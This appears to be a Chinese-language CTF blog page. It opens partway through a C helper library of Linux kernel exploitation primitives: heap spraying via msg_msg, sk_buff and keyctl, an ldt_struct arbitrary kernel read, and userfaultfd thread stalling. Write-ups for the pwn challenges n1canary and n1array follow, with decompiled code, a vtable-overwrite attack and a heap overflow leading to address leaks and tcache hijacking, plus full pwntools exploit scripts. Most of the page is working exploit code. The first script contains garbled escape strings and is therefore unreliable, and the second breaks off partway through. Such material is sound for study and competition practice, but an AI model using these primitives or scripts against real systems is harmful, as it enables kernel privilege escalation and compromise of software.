            /* idx comes from the pipe and indexes a stack array */
            if (req.idx < 0 || req.idx >= PGV_PAGE_NUM) {
                printf("[x] invalid index: %d\n", req.idx);
                break;
            }

            if (req.cmd == CMD_ALLOC_PAGE) {
                ret = create_socket_and_alloc_pages(req.size, req.nr);
                socket_fd[req.idx] = ret;
            } else {
                ret = close(socket_fd[req.idx]);
                socket_fd[req.idx] = -1;
            }
            break;
        case CMD_EXIT:
            ret = 0;
            break;
        default:
            printf("[x] invalid request: %d\n", req.cmd);
            break;
        }

        if (write(cmd_pipe_reply[1], &ret, sizeof(ret)) != (ssize_t) sizeof(ret))
            break;
    } while (req.cmd != CMD_EXIT);
}

/**
 * @brief initialise the pgv subsystem
 *
 * Creates the request/reply pipes and forks the child that runs
 * spray_cmd_handler(). The child terminates once the handler returns, so
 * only the parent ever returns from this function. Pipe or fork failures
 * are fatal and go through err_exit().
 */
void prepare_pgv_system(void)
{
    pid_t pid;

    /* pipes for pgv */
    if (pipe(cmd_pipe_req) < 0 || pipe(cmd_pipe_reply) < 0)
        err_exit("failed to create the pipes for pgv system!");

    /* child process for pages spray */
    pid = fork();
    if (pid < 0)
        err_exit("failed to fork the child for pgv system!");

    if (pid == 0) {
        spray_cmd_handler();
        /* the child must not fall through into the caller's code */
        exit(EXIT_SUCCESS);
    }
}

/**
* IV - keyctl related
*/

/**
* MUSL also doesn't ship `keyctl.h` :(
* Luckily we only need a few macros for exploitation,
* so defining them directly here is okay :)
*/

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specific keyring */
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's contents */

int key_alloc(char *description, void *payload, size_t plen)
{
return syscall(__NR_add_key, "user", description, payload, plen,
KEY_SPEC_PROCESS_KEYRING);
}

int key_update(int keyid, void *payload, size_t plen)
{
return syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);
}

int key_read(int keyid, void *buffer, size_t buflen)
{
return syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);
}

int key_revoke(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);
}

int key_unlink(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);
}

/**
* V - sk_buff spraying related
* note that the sk_buff's tail is with a 320-bytes skb_shared_info
*/
#define SOCKET_NUM 8
#define SK_BUFF_NUM 128

/**
* socket's definition should be like:
* int sk_sockets[SOCKET_NUM][2];
*/

int init_socket_array(int sk_socket[SOCKET_NUM][2])
{
/* socket pairs to spray sk_buff */
for (int i = 0; i < SOCKET_NUM; i++) {
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[i]) < 0) {
printf("[x] failed to create no.%d socket pair!\n", i);
return -1;
}
}

return 0;
}

int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (write(sk_socket[i][0], buf, size) < 0) {
printf("[x] failed to spray %d sk_buff for %d socket!", j, i);
return -1;
}
}
}

return 0;
}

int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (read(sk_socket[i][1], buf, size) < 0) {
puts("[x] failed to received sk_buff!");
return -1;
}
}
}

return 0;
}

/**
* VI - msg_msg related
*/

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

struct msg_msg {
struct list_head m_list;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};

struct msg_msgseg {
uint64_t next;
};

/*
struct msgbuf {
long mtype;
char mtext[0];
};
*/

int get_msg_queue(void)
{
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

ssize_t read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
* the msgp should be a pointer to the `struct msgbuf`,
* and the data should be stored in msgbuf.mtext
*/
ssize_t write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
((struct msgbuf*)msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
ssize_t peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp,
MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security)
{
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}

/**
* VII - ldt_struct related
*/

/**
* Sometimes we may want to compile the exp binary with MUSL-GCC, which
* doesn't ship the `asm/ldt.h` file.
* As the file is small, it is copied directly here :)
*/

/* Maximum number of LDT entries supported. */
#define LDT_ENTRIES 8192
/* The size of each LDT entry. */
#define LDT_ENTRY_SIZE 8

#ifndef __ASSEMBLY__
/*
* Note on 64bit base and limit is ignored and you cannot set DS/ES/CS
* not to the default values if you still want to do syscalls. This
* call is more for 32bit mode therefore.
*/
struct user_desc {
unsigned int entry_number;
unsigned int base_addr;
unsigned int limit;
unsigned int seg_32bit:1;
unsigned int contents:2;
unsigned int read_exec_only:1;
unsigned int limit_in_pages:1;
unsigned int seg_not_present:1;
unsigned int useable:1;
#ifdef __x86_64__
/*
* Because this bit is not present in 32-bit user code, user
* programs can pass uninitialized values here. Therefore, in
* any context in which a user_desc comes from a 32-bit program,
* the kernel must act as though lm == 0, regardless of the
* actual value.
*/
unsigned int lm:1;
#endif
};

#define MODIFY_LDT_CONTENTS_DATA 0
#define MODIFY_LDT_CONTENTS_STACK 1
#define MODIFY_LDT_CONTENTS_CODE 2

#endif /* !__ASSEMBLY__ */

/* this should be referred to your kernel */
#define SECONDARY_STARTUP_64 0xffffffff81000060

/* desc initializer */
static inline void init_desc(struct user_desc *desc)
{
/* init descriptor info */
desc->base_addr = 0xff0000;
desc->entry_number = 0x8000 / 8;
desc->limit = 0;
desc->seg_32bit = 0;
desc->contents = 0;
desc->limit_in_pages = 0;
desc->lm = 0;
desc->read_exec_only = 0;
desc->seg_not_present = 0;
desc->useable = 0;
}

/**
* @brief burte-force hitting page_offset_base by modifying ldt_struct
*
* @param ldt_cracker function to make the ldt_struct modifiable
* @param cracker_args args of ldt_cracker
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param burte_size size of each burte-force hitting
* @return size_t address of page_offset_base
*/
size_t ldt_guessing_direct_mapping_area(void *(*ldt_cracker)(void*),
void *cracker_args,
void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args,
uint64_t burte_size)
{
struct user_desc desc;
uint64_t page_offset_base = 0xffff888000000000;
uint64_t temp;
char *buf;
int retval;

/* init descriptor info */
init_desc(&desc);

/* make the ldt_struct modifiable */
ldt_cracker(cracker_args);
syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));

/* leak kernel direct mapping area by modify_ldt() */
while(1) {
ldt_momdifier(momdifier_args, page_offset_base);
retval = syscall(SYS_modify_ldt, 0, &temp, 8);
if (retval > 0) {
break;
}
else if (retval == 0) {
printf("[x] no mm->context.ldt!");
page_offset_base = -1;
break;
}
page_offset_base += burte_size;
}

return page_offset_base;
}

/**
* @brief read the contents from a specific kernel memory.
* Note that we should call ldtGuessingDirectMappingArea() firstly,
* and the function should be used in that caller process
*
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param addr address of kernel memory to read
* @param res_buf buf to be written the data from kernel memory
*/
void ldt_arbitrary_read(void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args, size_t addr, char *res_buf)
{
static char buf[0x8000];
struct user_desc desc;
uint64_t temp;
int pipe_fd[2];

/* init descriptor info */
init_desc(&desc);

/* modify the ldt_struct->entries to addr */
ldt_momdifier(momdifier_args, addr);

/* read data by the child process */
pipe(pipe_fd);
if (!fork()) {
/* child */
syscall(SYS_modify_ldt, 0, buf, 0x8000);
write(pipe_fd[1], buf, 0x8000);
exit(0);
} else {
/* parent */
wait(NULL);
read(pipe_fd[0], res_buf, 0x8000);
}

close(pipe_fd[0]);
close(pipe_fd[1]);
}

/**
* @brief seek specific content in the memory.
* Note that we should call ldtGuessingDirectMappingArea() firstly,
* and the function should be used in that caller process
*
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param page_offset_base the page_offset_base we leakked before
* @param mem_finder your own function to search on a 0x8000-bytes buf.
* It should be like `size_t func(void *args, char *buf)` and the `buf`
* is where we store the data from kernel in ldt_seeking_memory().
* The return val should be the offset of the `buf`, `-1` for failure
* @param finder_args your own function's args
* @return size_t kernel addr of content to find, -1 for failure
*/
size_t ldt_seeking_memory(void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args, uint64_t page_offset_base,
size_t (*mem_finder)(void*, char *), void *finder_args)
{
static char buf[0x8000];
size_t search_addr, result_addr = -1, offset;

search_addr = page_offset_base;

while (1) {
ldt_arbitrary_read(ldt_momdifier, momdifier_args, search_addr, buf);

offset = mem_finder(finder_args, buf);
if (offset != -1) {
result_addr = search_addr + offset;
break;
}

search_addr += 0x8000;
}

return result_addr;
}

/**
* VIII - userfaultfd related code
*/

/**
* MUSL also doesn't ship `userfaultfd.h` :(
* Luckily we only need a few macros for exploitation,
* so defining them directly here is okay :)
*/

#define UFFD_API ((uint64_t)0xAA)
#define _UFFDIO_REGISTER (0x00)
#define _UFFDIO_COPY (0x03)
#define _UFFDIO_API (0x3F)

/* userfaultfd ioctl ids */
#define UFFDIO 0xAA
#define UFFDIO_API _IOWR(UFFDIO, _UFFDIO_API, \
struct uffdio_api)
#define UFFDIO_REGISTER _IOWR(UFFDIO, _UFFDIO_REGISTER, \
struct uffdio_register)
#define UFFDIO_COPY _IOWR(UFFDIO, _UFFDIO_COPY, \
struct uffdio_copy)

/* read() structure */
struct uffd_msg {
uint8_t event;

uint8_t reserved1;
uint16_t reserved2;
uint32_t reserved3;

union {
struct {
uint64_t flags;
uint64_t address;
union {
uint32_t ptid;
} feat;
} pagefault;

struct {
uint32_t ufd;
} fork;

struct {
uint64_t from;
uint64_t to;
uint64_t len;
} remap;

struct {
uint64_t start;
uint64_t end;
} remove;

struct {
/* unused reserved fields */
uint64_t reserved1;
uint64_t reserved2;
uint64_t reserved3;
} reserved;
} arg;
} __attribute__((packed));

#define UFFD_EVENT_PAGEFAULT 0x12

struct uffdio_api {
uint64_t api;
uint64_t features;
uint64_t ioctls;
};

struct uffdio_range {
uint64_t start;
uint64_t len;
};

struct uffdio_register {
struct uffdio_range range;
#define UFFDIO_REGISTER_MODE_MISSING ((uint64_t)1<<0)
#define UFFDIO_REGISTER_MODE_WP ((uint64_t)1<<1)
uint64_t mode;
uint64_t ioctls;
};


struct uffdio_copy {
uint64_t dst;
uint64_t src;
uint64_t len;
#define UFFDIO_COPY_MODE_DONTWAKE ((uint64_t)1<<0)
uint64_t mode;
int64_t copy;
};

//#include <linux/userfaultfd.h>

char temp_page_for_stuck[0x1000];

void register_userfaultfd(pthread_t *monitor_thread, void *addr,
unsigned long len, void *(*handler)(void*))
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;

/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1) {
err_exit("userfaultfd");
}

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
err_exit("ioctl-UFFDIO_API");
}

uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
err_exit("ioctl-UFFDIO_REGISTER");
}

s = pthread_create(monitor_thread, NULL, handler, (void *) uffd);
if (s != 0) {
err_exit("pthread_create");
}
}

void *uffd_handler_for_stucking_thread(void *args)
{
struct uffd_msg msg;
int fault_cnt = 0;
long uffd;

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long) args;

for (;;) {
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);

if (nready == -1) {
err_exit("poll");
}

nread = read(uffd, &msg, sizeof(msg));

/* just stuck there is okay... */
sleep(100000000);

if (nread == 0) {
err_exit("EOF on userfaultfd!\n");
}

if (nread == -1) {
err_exit("read");
}

if (msg.event != UFFD_EVENT_PAGEFAULT) {
err_exit("Unexpected event on userfaultfd\n");
}

uffdio_copy.src = (unsigned long long) temp_page_for_stuck;
uffdio_copy.dst = (unsigned long long) msg.arg.pagefault.address &
~(0x1000 - 1);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
err_exit("ioctl-UFFDIO_COPY");
}

return NULL;
}
}

void register_userfaultfd_for_thread_stucking(pthread_t *monitor_thread,
void *buf, unsigned long len)
{
register_userfaultfd(monitor_thread, buf, len,
uffd_handler_for_stucking_thread);
}


/**
* IX - kernel structures
*/

struct file;
struct file_operations;
struct tty_struct;
struct tty_driver;
struct serial_icounter_struct;
struct ktermios;
struct termiox;
struct seq_operations;

struct seq_file {
char *buf;
size_t size;
size_t from;
size_t count;
size_t pad_until;
loff_t index;
loff_t read_pos;
uint64_t lock[4]; //struct mutex lock;
const struct seq_operations *op;
int poll_event;
const struct file *file;
void *private;
};

struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};

struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
int (*write_room)(struct tty_struct *tty);
int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
const struct file_operations *proc_fops;
};

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

#endif

n1canary

1
2
3
4
5
6
a.out: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=c1041d9d57f3f4dc0ad3e3ebb251ea748a0832d8, for GNU/Linux 4.4.0, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
  • 64位,statically,Partial RELRO,Canary,NX

漏洞分析

栈溢出漏洞:

1
2
3
puts("input something to pwn :)");
ProtectedBuffer<64ul>::mut<BOFApp::launch(void)::{lambda(char *)#1}>((__int64)v3, (__int64)&v2);
puts(v3);
1
2
3
4
__int64 __fastcall BOFApp::launch(void)::{lambda(char *)#1}::operator()(__int64 a1, __int64 a2)
{
return _isoc23_scanf((__int64)"%[^\n]", a2);
}

有后门函数:

1
2
3
4
__int64 backdoor(void)
{
return system("/readflag");
}

入侵思路

程序自定义了一个栈保护,使用 sys_getrandom 获取随机数生成 canary,这个 canary 几乎是不可能绕过的

程序使用了智能指针 unique_ptr,因此在当前语句块结束时会调用 BOFApp 的析构函数:

1
2
3
4
std::make_unique<BOFApp>((__int64)v6);
v4 = std::unique_ptr<BOFApp>::operator->((__int64)v6);
(*(void (__fastcall **)(__int64))(*(_QWORD *)v4 + 16LL))(v4);
std::unique_ptr<BOFApp>::~unique_ptr((__int64)v6);

并且 BOFApp 类本身具有虚函数,其虚表可以被我们覆盖:

1
2
3
4
5
6
7
8
9
10
pwndbg> telescope 0x7ffe4b0afa80
00:0000│ rax rdi 0x7ffe4b0afa80 ◂— 0x0
... ↓ 7 skipped
08:0040│         0x7ffe4b0afac0 ◂— 0x0
09:0048│         0x7ffe4b0afac8 ◂— 0xda64322f1f19d59
0a:0050│         0x7ffe4b0afad0 —▸ 0x7ffe4b0afc28 —▸ 0x7ffe4b0b02a6 ◂— 'HTTP_PROXY=http://127.0.0.1:7890/'
0b:0058│         0x7ffe4b0afad8 ◂— 0x7c3b282cea4eec00
0c:0060│         0x7ffe4b0afae0 —▸ 0x7ffe4b0afc18 —▸ 0x7ffe4b0b029e ◂— 0x74756f2e612f2e /* './a.out' */
0d:0068│         0x7ffe4b0afae8 —▸ 0x403407 (main+103) ◂— mov rax, rsp
0e:0070│         0x7ffe4b0afaf0 —▸ 0x6b3730 —▸ 0x4ed510 (__preinit_array_start+48) —▸ 0x40388c (BOFApp::~BOFApp()) ◂— sub rsp, 18h
1
2
3
4
pwndbg> telescope 0x4ed510
00:0000│  0x4ed510 (__preinit_array_start+48) —▸ 0x40388c (BOFApp::~BOFApp()) ◂— sub rsp, 18h
01:0008│  0x4ed518 (__preinit_array_start+56) —▸ 0x4038b8 (BOFApp::~BOFApp()) ◂— sub rsp, 18h
02:0010│  0x4ed520 (__preinit_array_start+64) —▸ 0x403552 (BOFApp::launch()) ◂— sub rsp, 88h

核心思路就是覆盖虚表,使其执行后门函数

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './a.out'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
#libc = ELF('libc-2.31.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('119.13.105.35','10111')

def debug():
gdb.attach(p,"b* 0x403909\n")
#gdb.attach(p,"b *$rebase()\n")
pause()

def cmd(op):
sla(">",str(op))

#debug()

vtable_addr = 0x4F4AA0
backdoor = 0x403387

vtable = p64(vtable_addr)
vtable += p64(backdoor)
vtable = vtable.ljust(0x40,b'\x00')

sa("canary",vtable)
sla("pwn :)",b'a'*0x68+p64(0x403407)+p64(vtable_addr))

p.interactive()

n1array

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.7) stable release version 2.31.
1
2
3
4
5
6
pwn: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=bf9f13ff31aa3f4c4036ab8bf12e14f3abe0d287, for GNU/Linux 3.2.0, not stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

程序分析

程序维护了一个 hashTable,每个条目都是一个 Chunk 结构体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
00000000 Chunk struc ; (sizeof=0x40, mappedto_21)
00000000 nelts dd ?
00000004 field_4 dd ?
00000008 atom dq ? ; offset
00000010 name_len dd ?
00000014 field_14 dd ?
00000018 name dq ? ; offset
00000020 value2 dd ?
00000024 value_nelts dd ?
00000028 value dq ? ; offset
00000030 type_nelts dd ?
00000034 field_34 dd ?
00000038 type_key dq ? ; offset
00000040 Chunk ends

其中记录了三种 Atom(name,type,value):

  • name:用于索引 hashTable
  • value:有两种模式
1
2
3
4
5
6
7
8
9
10
if ( a2->key )
{
chunk->value2 = a2->value2; /* 使用value2(整个数组的数据为同一个值) */
}
else
{
if ( (unsigned __int64)(4 * chunk->value_nelts) + 0x14 > a2->len )
__assert_fail("array->value.nelts * 4 + sizeof(struct ValueAtom) <= atom->len", "pwn.c", 0x8Du, "parseValueAtom");
chunk->value = (int *)&a2->value; /* 使用value数组(分别指定数组数据的每一个值) */
}

通过逆向分析,得出三种 Atom 的输入格式如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
def value_atom(nelts, value:list, key=0, value2=0):
# len | type | key | value2 | nelts | value
value_data = b"".join([p32(i) for i in value])
tmp = p32(1) + p32(key) + p32(value2) + p32(nelts) + value_data
tmp = p32(4 + len(tmp)) + tmp
return tmp

def type_atom(nelts, type:list):
# len | type | nelts | type
type_data = b"".join([p8(t) for t in type])
tmp = p32(2) + p32(nelts) + type_data
tmp = p32(4 + len(tmp)) + tmp
return tmp

def name_atom(name:bytes):
# len | type | name_len | name
tmp = p32(3) + p32(len(name)) + name
tmp = p32(4 + len(tmp)) + tmp
return tmp

漏洞分析

该题目的漏洞点比较隐秘,其核心在于 chunk->nelts 可能被重复写入:

1
2
3
4
5
6
7
8
9
10
11
chunk->value_nelts = type->nelts;
if ( type->key )
{
chunk->value2 = type->value2;
}
else
{
if ( (unsigned __int64)(4 * chunk->value_nelts) + 0x14 > type->len )
__assert_fail("array->value.nelts * 4 + sizeof(struct ValueAtom) <= atom->len", "pwn.c", 0x8Du, "parseValueAtom");
chunk->value = (int *)&type->value;
}

当我们先写入一次 chunk->value,再写入更长的 chunk->value2 时就会触发这个漏洞,此时 chunk->nelts 会覆盖为 chunk->value2 的长度,但程序大部分功能仍然优先使用 chunk->value

1
2
3
4
5
6
7
8
9
10
11
if ( a1->value )
{
for ( i = 0; a1->nelts > i; ++i )
printVal(a1->value[i], a1->type_key[i]);
}
else
{
value2 = a1->value2;
for ( j = 0; a1->nelts > j; ++j )
printVal(value2, a1->type_key[j]);
}

这就导致了堆溢出

入侵思路

先利用堆溢出泄露数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
payload = type_atom(0x100, [0]*0x100) + name_atom(b"1111\x00") + value_atom(1, [0x1000]*1) + value_atom(0x100, [0x1000], 1, 0)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(b"2222\x00") + value_atom(0x100, [0x1000]*0x100)
hash(payload)

dele(b"2222\x00")
show(b"1111\x00")

ru(" 0 0 1 2952790016 ")
leak_addr1 = eval(ru(" "))
success("leak_addr1 >> "+hex(leak_addr1))
leak_addr2 = eval(ru(" "))
success("leak_addr2 >> "+hex(leak_addr2))

leak_addr = (leak_addr2 & 0xff)*0x10000000000+leak_addr1*0x100
heap_base = leak_addr-0x300
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

ru(" 5 3758096384 ")
leak_addr1 = eval(ru(" "))
success("leak_addr1 >> "+hex(leak_addr1))
leak_addr = (0x7f & 0xff)*0x10000000000+leak_addr1*0x100
libc_base = leak_addr-0x1ecb00
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

最后劫持 tcache 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

# Short aliases over the pwntools tube `p`. `p` is only looked up when a
# lambda is called, so defining them before `p` is created is fine.
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg("expr") logs the name and the evaluated value of `expr` between ANSI
# colour escapes. The escapes need the leading "\0" (octal 033 == ESC);
# without it the literal text "33[1;31;40m" is printed instead.
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Pad a short leak to the full word width before unpacking. The fill must be
# the single byte b'\x00': bytes.ljust() raises TypeError for a multi-byte fill.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0x18DD)\n")
#pause()

def value_atom(nelts, value:list, key=0, value2=0):
# len | type | key | value2 | nelts | value
value_data = b"".join([p32(i) for i in value])
tmp = p32(1) + p32(key) + p32(value2) + p32(nelts) + value_data
tmp = p32(4 + len(tmp)) + tmp
return tmp

def type_atom(nelts, type:list):
# len | type | nelts | type
type_data = b"".join([p8(t) for t in type])
tmp = p32(2) + p32(nelts) + type_data
tmp = p32(4 + len(tmp)) + tmp
return tmp

def name_atom(name:bytes):
# len | type | name_len | name
tmp = p32(3) + p32(len(name)) + name
tmp = p32(4 + len(tmp)) + tmp
return tmp

def cmd(op):
sla("cmd>>",str(op))

def hash(data:bytes):
# data_len | 0 | data
cmd(0)
ru("atom>>")
p.send(p32(len(data)+8))
p.send(p32(0)+data)

def dele(name):
cmd(2)
sla("name>>",name)

def show(name):
cmd(1)
sla("name>>",name)

def edit(name,index,data):
cmd(3)
sla("name>>",name)
sla("Input Index: ",str(index))
sla("Input New Val: ",str(data))

#debug()

payload = type_atom(0x100, [0]*0x100) + name_atom(b"1111\x00") + value_atom(1, [0x1000]*1) + value_atom(0x100, [0x1000], 1, 0)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(b"2222\x00") + value_atom(0x100, [0x1000]*0x100)
hash(payload)

dele(b"2222\x00")
show(b"1111\x00")

ru(" 0 0 1 2952790016 ")
leak_addr1 = eval(ru(" "))
